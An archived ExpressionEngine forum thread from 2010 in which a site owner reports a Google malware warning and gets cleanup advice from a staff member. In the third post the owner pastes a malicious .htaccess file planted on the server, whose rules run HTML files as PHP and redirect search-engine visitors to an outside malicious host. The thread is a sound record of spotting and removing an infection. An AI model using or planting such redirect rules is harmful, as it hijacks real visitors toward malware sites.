We use cookies to help make our site work properly and to analyze how our site is used. Some are optional, but none contain your personal information, and we don't use any for ads. You can view our cookies policy, manage your cookie preferences, or consent and dismiss this banner by clicking agree:

Agree
ExpressionEngine CMS
Open, Free, Amazing

Thread

This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.

The active forums are here.

Malware attack

March 03, 2010 1:19am

Subscribe [3]

  • #1 / Mar 03, 2010 1:19am

    eyeonmedia

    11 posts

    I have been developing an expression engine build on my site http://www.eyeonlinemedia.com/clients/ffi

    and am in the process of moving it to its new home… catalog.thefriendshipforce.org

    and it looks like that some form of malware has infected the installation because after clicking on a couple links, I get (mostly the small navigation under the main buttons) I get the browser warning that I’m attaching to this email.

    I exported the database and re-imported it to catalog.thefriendshipforce.org and the problem persists…

    please advise!

  • #2 / Mar 03, 2010 2:06am

    John Henry Donovan

    12339 posts

    eyeonmedia,

    We take security very seriously and will do our best to work with you on figuring out what’s going on. To that, we need some additional information from you…

    The warning is from Google about another site which is the case if your site became infected recently with malware. Was there an existing site here before your new one?

    - EE version and build (found at the bottom of your control panel)
    - Other scripts on your account, whether in use or not (phpBB, etc…)

    Also, please do notify your host immediately if you haven’t done so yet. They should be able to help us determine the vector of attack.

    While we work through this, please check through these files:

      - path.php
      - config.php
      - index.php

    to ensure that there is no unusual code such as iFrames or Javascript includes; if you do find that code, then please back-up the file and remove said code.  If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

  • #3 / Mar 03, 2010 2:37am

    eyeonmedia

    11 posts

    I have found that a .htaccess file has been added to the root of the dir… added (not by me) a couple days ago:

    AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ive.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*news.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* <a href="http://full-x-clips.in/in.cgi?4&parameter=u">http://full-x-clips.in/in.cgi?4&parameter=u</a> [R,L]

    I changed my password and deleted the file. I’m hoping that there is no furthur contamination of the expression engine install…

    I contacted my host and they think it is an isolated attack; I replied back asking for more specific information if possible.

    thanks for the quick response, and let me know what more you may think of…

  • #4 / Mar 03, 2010 3:16am

    John Henry Donovan

    12339 posts

    eyeonmedia

    Your host should be able to tell you exactly how you were attacked.
    I would also change my ftp password from a different machine and run some anti-virus on your machine to be double sure

.(JavaScript must be enabled to view this email address)

ExpressionEngine News!

#eecms, #events, #releases

© Packet Tide, All Rights Reserved. Legal Notices

Username

Password

Forgot password?
or Register